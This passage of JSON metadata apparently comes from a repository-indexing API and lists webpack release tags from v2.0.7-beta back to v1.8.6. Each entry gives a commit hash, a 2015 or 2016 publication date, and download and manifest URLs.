a","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6"